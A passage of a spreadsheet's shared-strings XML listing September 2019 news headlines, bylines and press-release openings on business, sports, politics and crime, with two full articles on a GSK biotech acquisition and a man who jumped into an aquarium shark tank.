  </si>
  <si>
    <t>Schools should open seven days a week, throughout the year, and have designated police officers to help combat gangs and violence,...</t>
  </si>
  <si>
    <t>ALPHARETTA, Ga., Sept. 26, 2019 /PRNewswire/ -- Avanos Medical, Inc. (NYSE: AVNS) today announced publication acceptance from a large...</t>
  </si>
  <si>
    <t>NEW YORK, Sept. 23, 2019 /PRNewswire/ -- Rosen Law Firm, a global investor rights law firm, announces the filing of a class action lawsuit...</t>
  </si>
  <si>
    <t>Tickers: XCNQ:AREV, PINX:AREVF Tags: #Healthcare VANCOUVER, BC - TheNewswire - September 12, 2019 - AREV BRANDS INTERNATIONAL LTD....</t>
  </si>
  <si>
    <t>Vendavo, the market leader in commercial excellence solutions, announced today it has entered into a comprehensive settlement agreement...</t>
  </si>
  <si>
    <t>By Scot Bertram | The Center Square</t>
  </si>
  <si>
    <t>The rate of new home construction in Illinois continues to lag behind the rest of the country. Data from a national building permit survey...</t>
  </si>
  <si>
    <t>GLENWOOD, Md., Sept. 3, 2019 /PRNewswire/ -- Monte Nido &amp; Affiliates, the nation's leading provider of eating disorder treatment for over...</t>
  </si>
  <si>
    <t>Shimla, Sep 23 - Himachal Pradesh Chief Minister Jai Ram Thakur said here on Monday, 31,937 people availed of the Ayushman Bharat-Pradhan...</t>
  </si>
  <si>
    <t>LOS ANGELES (AP) — All six crewmembers were asleep aboard a scuba diving boat off the Southern California coast when a fire broke out in...</t>
  </si>
  <si>
    <t>Cash-starved Air India is putting its crew on a diet, changing their in-flight menu to special low-fat meals.</t>
  </si>
  <si>
    <t>Gov. Andrew Cuomo is pushing to enact a statewide ban on the sale of flavored e-cigarettes amid connected to vaping, especially . The...</t>
  </si>
  <si>
    <t>Pence Says North American Trade Deal Will Boost U.S. Automaking Jobs. Don’t Believe Him. The Trump administration is ramping up pressure...</t>
  </si>
  <si>
    <t>Mark Canty</t>
  </si>
  <si>
    <t>Investors sentiment decreased to 1.13 in Q1 2019. Its down 0.40, from 1.53 in 2018Q4. It fall, as 10 investors sold Frank's International...</t>
  </si>
  <si>
    <t>Bank of Montreal Can grew its stake in shares of AGCO Co. (NYSE:AGCO) by 824.9% in the second quarter, according to the company in its...</t>
  </si>
  <si>
    <t>Wheel Bearing Market report delivers statistical overview on growth factors driving or restraining the market with top manufacturers...</t>
  </si>
  <si>
    <t>TUCSON, Ariz., Sept. 3, 2019 /PRNewswire/ -- If a Medicare patient gets a service performed in a hospital-owned facility, Medicare may pay...</t>
  </si>
  <si>
    <t>SportsPulse: USA TODAY Sports' Paul Myerberg provides his opinion of the top three programs in the history of college football. USA TODAY...</t>
  </si>
  <si>
    <t>SELBYVILLE, Delaware, Sept. 19, 2019 /PRNewswire/ -- China microgrid market is slated to reach 1 GW by 2024. Exponential rise in power...</t>
  </si>
  <si>
    <t>Global "Military Vetronics Market" (2019), Industry Research Report is an in-depth study on the current state of the Global Military...</t>
  </si>
  <si>
    <t>Calum Chambers admits Arsenal cannot continue to rely on Pierre-Emerick Aubameyang’s goals. The Gunners striker hit his seventh goal in as...</t>
  </si>
  <si>
    <t>0 comment The Duchess of Sussex has said unemployed women will be boosted with “confidence and support” whenever a shopper buys an item...</t>
  </si>
  <si>
    <t>The Government has scrapped the Army’s zero-tolerance drugs policy, Defence Secretary Ben Wallace has confirmed. Speaking at a...</t>
  </si>
  <si>
    <t>Jennison Associates LLC lifted its position in The Ensign Group, Inc. (NASDAQ:ENSG) by 22.6% in the second quarter, according to its most...</t>
  </si>
  <si>
    <t>Dave Cruikshank</t>
  </si>
  <si>
    <t>One of the biggest hot rod show is coming to Michigan this weekend! 2,000 street rods, customs, muscle cars, and street machines will be...</t>
  </si>
  <si>
    <t>Improve International, a global leader in veterinary CPD, is to extend the range of learning formats it offers to veterinary professionals...</t>
  </si>
  <si>
    <t>MPs will return to Westminster after the summer recess this week – a break which has seen new Prime Minister Boris Johnson set out his...</t>
  </si>
  <si>
    <t>ATLANTA, Sept. 19, 2019 /PRNewswire/ -- While temperatures are holding in the 80's in most parts of the state today, Georgia has already...</t>
  </si>
  <si>
    <t>By STEFANIE DAZIO</t>
  </si>
  <si>
    <t>Barron Hilton, a hotel magnate who expanded his father's chain and became a founding owner in the American Football League, has died at his...</t>
  </si>
  <si>
    <t>FRIDAY, Sept. 27, 2019 -- Sports specialization is associated with a greater volume of vigorous sports activity and increased risk of...</t>
  </si>
  <si>
    <t>Mandy Bachus</t>
  </si>
  <si>
    <t>Ottawa-based laboratory revolutionizes the cybersecurity product certification process.</t>
  </si>
  <si>
    <t>Sainsbury's has announced a shake-up aimed at saving the company £500m over the next five years. The group said it would shut a further 70...</t>
  </si>
  <si>
    <t>NEW YORK, NY / ACCESSWIRE / September 27, 2019 / The Klein Law Firm announces that class action complaints have been filed on behalf of...</t>
  </si>
  <si>
    <t>At the recent Climate Week in New York, Schneider Electric announced that it is drastically stepping up its commitment to carbon neutrality...</t>
  </si>
  <si>
    <t>By Stanley Widianto Reuters JAKARTA, Sept 24 (Reuters) - Tens of thousands of people have protested across Indonesia this week over a...</t>
  </si>
  <si>
    <t>The Motown mogul who launched the careers of numerous stars including Stevie Wonder, Diana Ross and Michael Jackson has announced his...</t>
  </si>
  <si>
    <t>MILAN, Sept 22, 2019 (BSS/AFP) – Romelu Lukaku fired Inter Milan back top of Serie A with the second goal of a 2-0 derby win that extended...</t>
  </si>
  <si>
    <t>Shares of Meritage Homes Corp (NYSE:MTH) have earned a consensus recommendation of “Buy” from the twelve ratings firms that are covering...</t>
  </si>
  <si>
    <t>Mad man</t>
  </si>
  <si>
    <t>I agree that some (most) have held a bag for a long time.... If anyone insist in doing so... I would suggest selling no more than half your...</t>
  </si>
  <si>
    <t>The beyond two club best and fairest winners could be crucial to the Giants' possibilities of beating the Western Bulldogs in Saturday's...</t>
  </si>
  <si>
    <t>jenny124124 (Posted by)</t>
  </si>
  <si>
    <t>A 21-year-old has been jailed for more than three years after beating his 90-year-old father to death because his mother asked the son for...</t>
  </si>
  <si>
    <t>Jan Vertonghen has revealed Tottenham’s VAR pain after their controversial defeat at Leicester.</t>
  </si>
  <si>
    <t>THOUSAND OAKS, Calif., Sept. 27, 2019 /PRNewswire/ -- Amgen (NASDAQ: AMGN) today announced new data from the ongoing Phase 1 study...</t>
  </si>
  <si>
    <t>An anti-corruption campaigner and his elderly father assaulted near Ipswich have reacted with shock after learning the only person jailed...</t>
  </si>
  <si>
    <t>ENGLEWOOD CLIFFS, N.J., Sept. 12, 2019 /PRNewswire/ -- Today, Unilever and Walmart launched Bring It to the Bin, a shopper-engagement...</t>
  </si>
  <si>
    <t>Avalon Ventures today announced that it entered into a definitive agreement with GlaxoSmithKline (GSK) for the acquisition of Sitari Pharmaceuticals by GSK. Sitari has been developing a novel treatment for celiac disease and was the first company formed under the GSK-Avalon venture collaboration in 2013. Sitari was incubated at COI Pharmaceuticals, the Community of Innovation established by Avalon Ventures. "Our collaboration with GSK has been overwhelmingly positive as we were able to rapidly launch a series of new companies based on promising scientific research, and we successfully advanced five programs into preclinical studies for a variety of unmet medical needs," said Jay Lichter, Ph.D., CEO of Sitari, president and CEO of COI, and managing director of Avalon Ventures. "Sitari's preclinical program has the potential to become a medicine to help millions of patients with celiac disease, and we are excited that GSK, a leader in developing innovative medicines, will be advancing the program." Genetic predisposition plays a key role in celiac disease, which is an autoimmune digestive disorder caused by intolerance to gluten, a protein found in wheat, rye, and barley, that damages the small intestine and interferes with absorption of nutrients from food. The enzymatic activity of transglutaminase 2 (TG2) is responsible for triggering the inflammatory cascade in response to gluten exposure in patients with celiac disease. Sitari's TG2 inhibitors have the potential to suppress the autoimmune response that results in intestinal inflammation and cell pathogenesis in celiac patients. "Over the last six years, GSK and Avalon have pioneered a unique biotech funding model designed to identify novel targets from top-tier academic labs and translate cutting-edge discoveries into promising clinical candidates," said John Lepore, SVP, Research, GSK. "Bringing the Sitari TG2 program into GSK is strongly aligned with our research focus on genetically-associated targets and immune-driven disease. The current standard of care for celiac disease is strict adherence to a gluten-free diet, but a significant number of patients still experience gastrointestinal symptoms and disease progression. TG2 inhibition could represent a new hope for celiac disease patients." The first-of-its-kind collaboration between Avalon Ventures and GSK combined Avalon's successful approach of investing in early-stage life science innovation with GSK's expertise and resources in drug discovery and development. The eight companies formed under the collaboration were incubated at COI Pharmaceuticals, Community of Innovation, where they received executive leadership and operational management. Under the terms of the agreement, GSK acquired Sitari and all of its intellectual property. Financial terms were not disclosed. About COI Pharmaceuticals COI Pharmaceuticals is a life science incubator entity that provides inventors with an environment where entrepreneurial and scientific risks are encouraged and rewarded. This Community of Innovation (COI) was established in 2013 to support a portfolio of companies that included those funded through a collaboration between Avalon Ventures and GSK. COI provides the intellectual capital to launch companies, a fully-equipped R&amp;D infrastructure and industry mentors prepared to leverage their expertise to help entrepreneurial scientists succeed. COI is located in La Jolla, California. For more information, please visit: www.coipharma.com. About Avalon Ventures Avalon Ventures is a venture capital firm that has founded and/or funded more than 127 information technology and life sciences companies. The firm is passionate about backing talented entrepreneurs seeking to build market-leading companies. Throughout the firm's 32-year tenure, Avalon's long-standing and successful focus has been on seed and early-stage companies. All Avalon partners are seasoned entrepreneurs with experience in company formation, operations, and value creation in the life science and tech sectors. Avalon's current fund, launched in 2015, continues the firm's tradition of pursuing disruptive ideas in ever changing markets. For more information, please visit: www.avalon-ventures.com.</t>
  </si>
  <si>
    <t>Sep, Thu 19 2019 - 3:30 PM to 5:00 PM</t>
  </si>
  <si>
    <t>PORTLAND, Maine (AP) — A man looking to bring commercial development to an historic fort in Maine is facing opposition. Mike Dugay says...</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — The Latest on President Donald Trump and former national security adviser John Bolton (all times local): 1 p.m. President...</t>
  </si>
  <si>
    <t>Philiana Ng‍, ET Online</t>
  </si>
  <si>
    <t>Sterling K. Brown Says 'This Is Us' Season 4 Starts to 'Bring Closure to the Story' (Exclusive)</t>
  </si>
  <si>
    <t>SALT LAKE CITY (AP) — One of three kayakers rescued after having to swim while being battered by waves on Utah's Great Salt Lake says he...</t>
  </si>
  <si>
    <t>Sandra Gittlen (Network World)</t>
  </si>
  <si>
    <t>IoT deployments are fueling investments in edge computing infrastructure, including edge gateways and hyperconverged infrastructure.</t>
  </si>
  <si>
    <t>The fluorine chemicals industry refers to a branch industry of the chemical industry where fluorine is the main component of products....</t>
  </si>
  <si>
    <t>‘In the current situation, everything must be done to avoid violence,’ German chancellor says in Beijing</t>
  </si>
  <si>
    <t>News Highlights: BURLINGTON, Mass., Sept. 09, 2019 (GLOBE NEWSWIRE) -- Avid® (Nasdaq: AVID) today unveiled the new MediaCentral® l...</t>
  </si>
  <si>
    <t>Photo by way of Vince Fedoroff Dr. Brendan Hanley, Yukon's chief medical fitness officer A school-based mostly measles trap-up campaign...</t>
  </si>
  <si>
    <t>facebookSHARE twitterTWEET email whatsapp Roosters coach Trent Robinson and his players are not entertaining talk about back-to-back...</t>
  </si>
  <si>
    <t>The Drum has unveiled this week's instalment of its online video series The Drum Show, which look at the big talking points in media and...</t>
  </si>
  <si>
    <t>England were beaten in this summer’s Women’s Ashes and now face a busy winter.</t>
  </si>
  <si>
    <t>Review Roundups</t>
  </si>
  <si>
    <t>Two legendary actors come together in one unforgettable story of a shared life and all of its complexities. Two-time Olivier and Tony Award...</t>
  </si>
  <si>
    <t>Manchester United are to undertake a "detailed and comprehensive study" into the feasibility of trialling rail seats at Old Trafford.</t>
  </si>
  <si>
    <t>LOVINGSTON, Va. (AP) — Authorities in Virginia say a yak on its way to the butcher's shop escaped to the nearby mountains avoiding animal...</t>
  </si>
  <si>
    <t>Hollywood stuntwoman Olivia Jackson was once employed as a frame double for actress Milla Jovovich within the blockbuster motion film...</t>
  </si>
  <si>
    <t>Charlie Neibergall;Charlie Neibergall;Charlie Neibergall;Charlie Neibergall;Charlie Neibergall;Charlie Neibergall;By THOMAS BEAUMONT Associated Press;Charlie Neibergall;Charlie Neibergall;Charlie Neibergall;Charlie Neibergall;Charlie Neibergall;Charlie Neibergall</t>
  </si>
  <si>
    <t>WEST DES MOINES, Iowa (AP) — In the back of a West Des Moines brew pub, a dozen supporters of Pete Buttigieg sipped craft beer and wine,...</t>
  </si>
  <si>
    <t>SOURCE: Discovery Education Silver Spring, Md., Friday, September 6, 2019 /3BL Media/ – Jackson Charitable Foundation, a nonprofit with the...</t>
  </si>
  <si>
    <t>Cheslin Kolbe has handed South Africa a big boost by confirming he avoided any injury in Saturday’s 23-13 loss to New Zealand. The...</t>
  </si>
  <si>
    <t>By STEFANIE DAZIO Associated Press</t>
  </si>
  <si>
    <t>LOS ANGELES (AP) — A Los Angeles judge has rescinded sanctions against two prosecutors whom she said had failed give defense lawyers...</t>
  </si>
  <si>
    <t>MONTREAL, Sept. 18, 2019 /CNW Telbec/ - Letko, Brosseau &amp; Associates Inc., an independent investment manager that exercises investment...</t>
  </si>
  <si>
    <t>Tony Jones, PA Court Correspondent</t>
  </si>
  <si>
    <t>The Duchess of Sussex is to carry out her first official public engagement since the birth of her son - launching a high street clothing...</t>
  </si>
  <si>
    <t>Colombia's President Ivan Duque waves upon his arrival for a meeting with leaders of several South American nations that share the Amazon,...</t>
  </si>
  <si>
    <t>CAPE TOWN, South Africa (AP) — Prince Harry and his wife, Meghan, the Duchess of Sussex, are starting their first official tour as a family...</t>
  </si>
  <si>
    <t>The Duchess of Sussex is expected to join her husband the duke – by an online video call – when he learns about efforts to support female...</t>
  </si>
  <si>
    <t>Thomas Mitchell</t>
  </si>
  <si>
    <t>September 19, 2019 By Thomas Mitchell Leave a Comment The Spanish Springs High football team earned its first win of the season Friday...</t>
  </si>
  <si>
    <t>James Griggs</t>
  </si>
  <si>
    <t>Catabasis Pharmaceuticals (NASDAQ:CATB) Receives a Downgrade BidaskScore has decided to issue a report indicating that Catabasis...</t>
  </si>
  <si>
    <t>Beginning today, the sizzle is back with Bojangles’ one-of-a-kind Pork Chop Griller Biscuit. As one of the only grilled pork chop biscuits...</t>
  </si>
  <si>
    <t>Andy Hodges</t>
  </si>
  <si>
    <t>Barefoot Bay, a community in Micco, Florida, is a safe place to live, according to crime rate statistics that were collected a week ago. A...</t>
  </si>
  <si>
    <t>Company to showcase new controllers, CP-16i Cool power amplifier, and X-Series HDBaseT video distribution.</t>
  </si>
  <si>
    <t>Study Highlights: Embargoed until 4 a.m. CT / 5 a.m. ET Wednesday, Sept. 25, 2019 (NewMediaWire) - September 25, 2019 - DALLAS - On-the-job...</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — The Latest on new House members from North Carolina (all times local): 6:30 p.m. House Speaker Nancy Pelosi has sworn in...</t>
  </si>
  <si>
    <t>VANCOUVER — The extradition trial for Huawei executive Meng Wanzhou won’t begin until January but details of the arguments her defence team...</t>
  </si>
  <si>
    <t>By NAPS,   North American Precis Syndicate</t>
  </si>
  <si>
    <t>(NAPSI)—It’s important to evaluate your Medicare Prescription Drug Plan every year. Your plan benefits can change, including your...</t>
  </si>
  <si>
    <t>DUBLIN, Sept. 4, 2019 /PRNewswire/ -- The "UnitedSiC Cascode JFET 650V Family" report has been added to ResearchAndMarkets.com's offering....</t>
  </si>
  <si>
    <t>Bart</t>
  </si>
  <si>
    <t>Every week, hundreds of artists share their work on the Blender Artists forum. I'm putting some of the best work in the spotlight in a...</t>
  </si>
  <si>
    <t>Greenwich Entertainment Greenwich Entertainment Linda Ronstadt: The Sound of My Voice, a new documentary that looks at the life and career...</t>
  </si>
  <si>
    <t>DUBLIN, Sept. 2, 2019 /PRNewswire/ -- The "Immersion Cooling Market by Type (Single-Phase and Two-Phase), Application (High Performance...</t>
  </si>
  <si>
    <t>A family who became trapped on the top of a remote 40-foot waterfall during a four-day camping trip received help in an unlikely way....</t>
  </si>
  <si>
    <t>Daniel Palmer</t>
  </si>
  <si>
    <t>Craig Wright, the Australian entrepreneur who controversially claims he is Satoshi Nakamoto, is moving to settle a case that looks set to...</t>
  </si>
  <si>
    <t>The annual cleanup is set from Sept. 21 to 28, and is looking for volunteers</t>
  </si>
  <si>
    <t>CAIRO (AP) — The prosecution of a 15-year-old girl who killed a bus driver after he allegedly tried to rape her has reignited debate over...</t>
  </si>
  <si>
    <t>One of the great “promises” of cannabis legalization is the idea that people of color--those most disproportionately and negatively...</t>
  </si>
  <si>
    <t>Christina Haley O'Neal</t>
  </si>
  <si>
    <t>Wade Associates has added two new members to its team, and one employee has received a recent honor. Leslie Tyler and Pate Southerland...</t>
  </si>
  <si>
    <t>Liverpool manager Jurgen Klopp took a tongue-in-cheek swipe at title rivals Manchester City by claiming he would rather win eight matches...</t>
  </si>
  <si>
    <t>New York, NY, Sept. 06, 2019 (GLOBE NEWSWIRE) -- Highlights: IBC 2019 Stand 2.B41 Kaltura, the leading video technology provider,...</t>
  </si>
  <si>
    <t>WASHINGTON (AFP) - Twitter said it shut down thousands of accounts worldwide for spreading misinformation, including some artificially...</t>
  </si>
  <si>
    <t>Posted by Darin Gantt</t>
  </si>
  <si>
    <t>Getty Images Mackensie Alexander doesn’t need surgery, and the Vikings won’t have to make a roster move for him either. According to Tom...</t>
  </si>
  <si>
    <t>NEW YORK, Sept. 09, 2019 (GLOBE NEWSWIRE) -- Ovid Therapeutics Inc. (NASDAQ: OVID), a biopharmaceutical company committed to developing...</t>
  </si>
  <si>
    <t>DETROIT (AP) — Contract talks between General Motors and the United Auto Workers were set to resume Tuesday after a pause overnight as a...</t>
  </si>
  <si>
    <t>JONATHAN LEMIRE and ZEKE MILLER , Associated Press</t>
  </si>
  <si>
    <t>The Trump White House has no equivalent to the team of veteran lawyers and aggressive press aides Bill Clinton had during his impeachment...</t>
  </si>
  <si>
    <t>Westminster is braced for a showdown that could lead to a snap election as a cross-party alliance takes on Prime Minister Boris Johnson....</t>
  </si>
  <si>
    <t>In today’s world of perpetual connectivity where information has become very accessible not just for consumption but also for analysis and...</t>
  </si>
  <si>
    <t>Dublin, Sept. 10, 2019 (GLOBE NEWSWIRE) -- The "Geospatial Analytics Market Size, Share &amp; Trends Analysis Report By Component, By...</t>
  </si>
  <si>
    <t>Hundreds of teens received a life saving lesson at one Long Island high school today. They were introduced to the dangers of drunk and...</t>
  </si>
  <si>
    <t>Carrie Lamoureux</t>
  </si>
  <si>
    <t>Investors sentiment increased to 1.39 in 2019 Q2. Its up 0.62, from 0.77 in 2019Q1. It is positive, as 17 investors sold Pilgrim's Pride...</t>
  </si>
  <si>
    <t>SAN FRANCISCO, Sept. 09, 2019 (GLOBE NEWSWIRE) -- TERRA, the leading Food &amp; Agriculture Accelerator, is kicking off its fourth Cohort...</t>
  </si>
  <si>
    <t>Patrick Doyle;Patrick Doyle;Patrick Doyle;Patrick Doyle;Patrick Doyle;Patrick Doyle;Patrick Doyle;Patrick Doyle;Patrick Doyle;Patrick Doyle</t>
  </si>
  <si>
    <t>Share Photos: CHEO Dream of a Lifetime home for 2019 Tumblr Pinterest...</t>
  </si>
  <si>
    <t>The "Asia Pacific Endodontic Devices Market to 2027 - Regional Analysis and Forecasts by Product; End User, and Country" report has been...</t>
  </si>
  <si>
    <t>2020 HFPA/Film Independent winners from TIFF: (from left) Charles Williams, Chema Garcia and Karen Chapman react to the announcement at...</t>
  </si>
  <si>
    <t>Market Research Consultants</t>
  </si>
  <si>
    <t>Will Weissert .</t>
  </si>
  <si>
    <t>Elizabeth Warren's call for a new 2% tax on the wealthiest Americans is so popular among her supporters that impromptu chants of "two...</t>
  </si>
  <si>
    <t>ST. LOUIS --(BUSINESS WIRE) Caleres (NYSE: CAL) announced today the “Feel A Little Famous” Contest for members of Famous Footwear’s...</t>
  </si>
  <si>
    <t>The "Malaysia Convenience Store Market Outlook 2022" report has been added to ResearchAndMarkets.com's offering. The modern retail outlets...</t>
  </si>
  <si>
    <t>A man has been charged with causing death by dangerous driving after a 10-year-old schoolgirl died in a suspected hit-and-run. Melissa...</t>
  </si>
  <si>
    <t>Dan Melson</t>
  </si>
  <si>
    <t>My article Debunking the Money Merge Account Scam has been getting a lot of attention and a large amount of hate mail lately. The scamsters...</t>
  </si>
  <si>
    <t>Collingwood assistant Justin Longmuir has been appointed head coach of AFL club Fremantle. The 38-year-old former Dockers player has been...</t>
  </si>
  <si>
    <t>Morgan Smith, New Products Editor</t>
  </si>
  <si>
    <t>Are changed over in seconds to handle new products</t>
  </si>
  <si>
    <t>By KEN RITTER Associated Press</t>
  </si>
  <si>
    <t>HIKO, Nev. (AP) — The stage was set Thursday for music and other space-themed entertainment as Earthlings descended on the Nevada desert...</t>
  </si>
  <si>
    <t>Ten hours before kickoff Saturday, Nebraska football coach Scott Frost seemed loose. He smiled during his appearance on ESPN's "College...</t>
  </si>
  <si>
    <t>Melissa Pandika</t>
  </si>
  <si>
    <t>A new vanguard of female pastors is fighting for LGBTQ equality, standing up to a church that has long disempowered both women and queer...</t>
  </si>
  <si>
    <t>Scott Billeck                        More from Scott Billeck</t>
  </si>
  <si>
    <t>At this point last season, there was still some doubt whether or not Laurent Brossoit would become Connor Hellebuyck’s understudy.Despite...</t>
  </si>
  <si>
    <t>Naomie Harris had to learn to walk again Naomie Harris spent a month in hospital after she had an operation to fix her scoliosis and had...</t>
  </si>
  <si>
    <t>A 16-year-old boy has been charged in connection with the stabbing murder of 21-year-old Meshach Williams in Brent in north-west London in...</t>
  </si>
  <si>
    <t>by GEOFF MULVIHILL Associated Press</t>
  </si>
  <si>
    <t>OxyContin maker Purdue Pharma and its owners expressed sympathy but not responsibility for the nation's opioid crisis as the company filed...</t>
  </si>
  <si>
    <t>The Government is being urged to reverse a “decade of cuts” to the fire service which union leaders warn have left it in crisis. The Fire...</t>
  </si>
  <si>
    <t>hksar gov</t>
  </si>
  <si>
    <t>The following is issued on behalf of the Hong Kong Monetary Authority: The Hong Kong Monetary Authority announced today (September 19)...</t>
  </si>
  <si>
    <t>Puravida19</t>
  </si>
  <si>
    <t>a question and answer on the Quantummaterialscorp.com blog- Q: You can secure products with QDX, the next step is to be able to read the...</t>
  </si>
  <si>
    <t>Chris Haire</t>
  </si>
  <si>
    <t>Long Beach on Saturday morning, Sept. 21, will officially christen and open its new 92,500-square-foot, $48 million main library, named in...</t>
  </si>
  <si>
    <t>Vicor Corporation today announced the appointment of Nicolas Richard to the role of Director of Automotive Business Development for...</t>
  </si>
  <si>
    <t>Chloe McGuire</t>
  </si>
  <si>
    <t>Shares of AirMedia Group Inc (NASDAQ:ANTE) passed above its two hundred day moving average during trading on Wednesday . The stock has a...</t>
  </si>
  <si>
    <t>Luxury car maker Volkswagen will face a German court on Monday, as hundreds of thousands of owners of manipulated diesel cars demand...</t>
  </si>
  <si>
    <t>PHOENIX, Sept. 25, 2019 /PRNewswire-PRWeb/ -- The HeroZona Foundation and the American Legion Travis L. Williams Post 65's third "Play It...</t>
  </si>
  <si>
    <t>WINDSOR, Ontario, Sept. 25, 2019 /PRNewswire/ -- The FCA Automotive Research and Development Centre (ARDC) inaugurated a new Vehicle...</t>
  </si>
  <si>
    <t>Fallon Glick</t>
  </si>
  <si>
    <t>Audio crew members will be taking sound pressure level readings in surrounding neighborhoods.</t>
  </si>
  <si>
    <t>Wray Morrison</t>
  </si>
  <si>
    <t>Saskatoon / 650 CKOM</t>
  </si>
  <si>
    <t>The North American animal vaccines market is set to cross $3.6 billion by 2025, propelled by rising pet adoption and personalized medicines...</t>
  </si>
  <si>
    <t>by Peter Wales</t>
  </si>
  <si>
    <t>Kilmarnock manager Angelo Alessio has refuted Kirk Broadfoot's claims about his training and insists he believes in his methods.</t>
  </si>
  <si>
    <t>Orlando Bloom bought a snake to conquer his fear. The 'Pirates of the Caribbean' star is afraid of the reptiles and so decided to have one...</t>
  </si>
  <si>
    <t>Manufacturing journalist TR Cutler recently announced that he will be profiling the fundamental rationale for Lean as small and midsized...</t>
  </si>
  <si>
    <t>PHILADELPHIA--(BUSINESS WIRE)--Sep 12, 2019-- Independence Realty Trust, Inc. (“IRT”) (NYSE:IRT) announced that today IRT’s board of...</t>
  </si>
  <si>
    <t>Magna Terra Minerals Inc (MTT.V) shares under being placed under the lens today as the Twiggs Money Flow indicator, or TMF has climbed...</t>
  </si>
  <si>
    <t>Associated Press;Bobby Haven</t>
  </si>
  <si>
    <t>Smoke rises from a cargo ship that capsized in the St. Simons Island, Georgia sound Sunday, Sept. 8, 2019. (Bobby Haven/The Brunswick News...</t>
  </si>
  <si>
    <t>USADATA, the market leader in targeting capabilities and data, announced today a free, new report for businesses called the Data...</t>
  </si>
  <si>
    <t>James Andrews;Neil Shaw</t>
  </si>
  <si>
    <t>Parents are urged to stop using it immediately A high chair sold by major retailer Argos is being urgently recalled because it could fall...</t>
  </si>
  <si>
    <t>VATICAN CITY (AP) — Pope Francis on Sunday decried "the culture of comfort" that leads to indifference in the face of a global migration...</t>
  </si>
  <si>
    <t>HUNTSVILLE, Ala., Sept. 17, 2019 /PRNewswire/ -- Officials from NASA's Marshall Space Flight Center will share the latest contract...</t>
  </si>
  <si>
    <t>JAGGAER</t>
  </si>
  <si>
    <t>RESEARCH TRIANGLE, N.C. and MILAN, Italy, Sept. 16, 2019 (GLOBE NEWSWIRE) -- JAGGAER, the world’s largest independent spend management...</t>
  </si>
  <si>
    <t>MIAMI (AP) — Beachgoers on the southeastern U.S. coast should be wary of potentially dangerous rip currents caused by Hurricane Humberto,...</t>
  </si>
  <si>
    <t>Shark Tank star Kevin O'Leary's wife, Linda, has been charged in connection with the August boat crash at Lake Joseph in Canada that killed...</t>
  </si>
  <si>
    <t>Chris Morgan, who is also everyday because the Bagel Guy, won't be combating any celebrities every time quickly. This past weekend, Morgan...</t>
  </si>
  <si>
    <t>The Education Department fining Michigan State University $4.five million for failing to respond to sexual attack complaints towards former...</t>
  </si>
  <si>
    <t>By MATTHEW DALY Associated Press</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — Senate Majority Leader Mitch McConnell says he's waiting for the White House to chart a path forward on gun violence...</t>
  </si>
  <si>
    <t>Orbis Research Present’s “Global Education Enterprise Resource Planning (ERP) Software Market Report 2019” magnify the decision making...</t>
  </si>
  <si>
    <t>TORONTO — A British Columbia man accused of stripping naked and jumping into a shark tank at a Toronto aquarium has pleaded guilty to mischief. David Weaver, of Nelson, B.C., was arrested and charged in October of last year, four days after the incident. Police say he went to Ripley's Aquarium in downtown Toronto on Oct. 12, bought a ticket, then stripped naked and jumped into the facility's shark tank. A large crowd was at the aquarium that night and some in attendance took videos of the incident. The videos, which attracted international attention after surfacing on social media, show a naked man swimming in the tank with sand tiger sharks, sawfish and moray eels. The man then starts to climb out of the tank before performing a back dive into the water. Officials have said the man then got out and got dressed but left behind a T-shirt and his jacket. Police have said by the time they arrived at the aquarium, the man had fled. Weaver was arrested near Thunder Bay, Ont., — hundreds of kilometres away — during a vehicle stop. Police have also alleged that earlier on Oct. 12, Weaver assaulted a man outside Medieval Times, a jousting-themed dinner theatre. A window was also allegedly broken. Weaver was charged with assault and mischief in that earlier incident, which is now being dealt with separately by the court, and will face trial on those charges in late October. The Canadian Press</t>
  </si>
  <si>
    <t>By Meg Barone</t>
  </si>
  <si>
    <t>WESTON — In a landscape of colonial farmhouses, traditional colonials and contemporary houses, the wheat beige-colored house with white...</t>
  </si>
  <si>
    <t>Victory Capital Management Inc. grew its position in Dana Inc (NYSE:DAN) by 3,016.1% during the second quarter, according to the company in...</t>
  </si>
  <si>
    <t>Micah Mattix</t>
  </si>
  <si>
    <t>When it comes to hell, you might decide, after reading a few ambiguous passages out of context from the Bible, that there is a possibility...</t>
  </si>
  <si>
    <t>Gene Maddaus, provided by</t>
  </si>
  <si>
    <t>Jordan Pruitt, a contestant on the third season of “The Voice,” has filed a lawsuit accusing her former manager, Keith Thomas, of sexually...</t>
  </si>
  <si>
    <t>September 17, 2019 Researchers at JLL predict that as the amount of vacant industrial land in the West Inland Empire approaches 2%, tenants...</t>
  </si>
  <si>
    <t>A look at what's happening around the majors Thursday: STRAS TEST Stephen Strasburg (16-5, 3.47 ERA) starts as Washington begins a...</t>
  </si>
  <si>
    <t>BASRA, Iraq, Sept. 26, 2019 /PRNewswire/ -- Speedcast International Limited (ASX: SDA), the world's most trusted provider of remote...</t>
  </si>
  <si>
    <t>Nintendo Co Ltd's hotly awaited mobile title Mario Kart Tour launched on Wednesday with many users complaining server overload meant they...</t>
  </si>
  <si>
    <t>Upon being asked whether she supports an increase in military spending, Green Party Leader Elizabeth May said she or her party never did....</t>
  </si>
  <si>
    <t>Davis Potter davis.potter@trib.com</t>
  </si>
  <si>
    <t>LARAMIE -- It’s hard to do much more than what Alijah Halliburton did on the back end of Wyoming’s defense Saturday, but that’s what the...</t>
  </si>
  <si>
    <t>SALISBURY, Md., Sept. 12, 2019 /PRNewswire-PRWeb/ -- Soybean researchers seeking funding from the Maryland Soybean Board for new soybean...</t>
  </si>
  <si>
    <t>The report studies the global Dichroic Filters market with CAGR, SWOT Analysis, Top Players, Types, Applications, Growth Opportunities,...</t>
  </si>
  <si>
    <t>TORRANCE, Calif., Sep 12, 2019 (SEND2PRESS NEWSWIRE) -- Notes Bring Hope, a charitable arm of the Asia America Symphony (AASA), hosted its...</t>
  </si>
  <si>
    <t>Freehold units now available at The Ritz-Carlton Residences, Bangkok</t>
  </si>
  <si>
    <t>Jessica Galletly, Lifestyle editor, The Advertiser</t>
  </si>
  <si>
    <t>When Beerenberg founder Grant Paech picked his first strawberry on September 6, 1969, his wife, Carol, took a photo to record it for...</t>
  </si>
  <si>
    <t>Alaska regulators are considering whether the state should continue replenishing a rural telephone and internet service fund or shut it...</t>
  </si>
  <si>
    <t>Ian Mathews</t>
  </si>
  <si>
    <t>Most successful careers end abruptly like Eli Manning's tenure with the New York Giants. Successful track records can't be rewarded...</t>
  </si>
  <si>
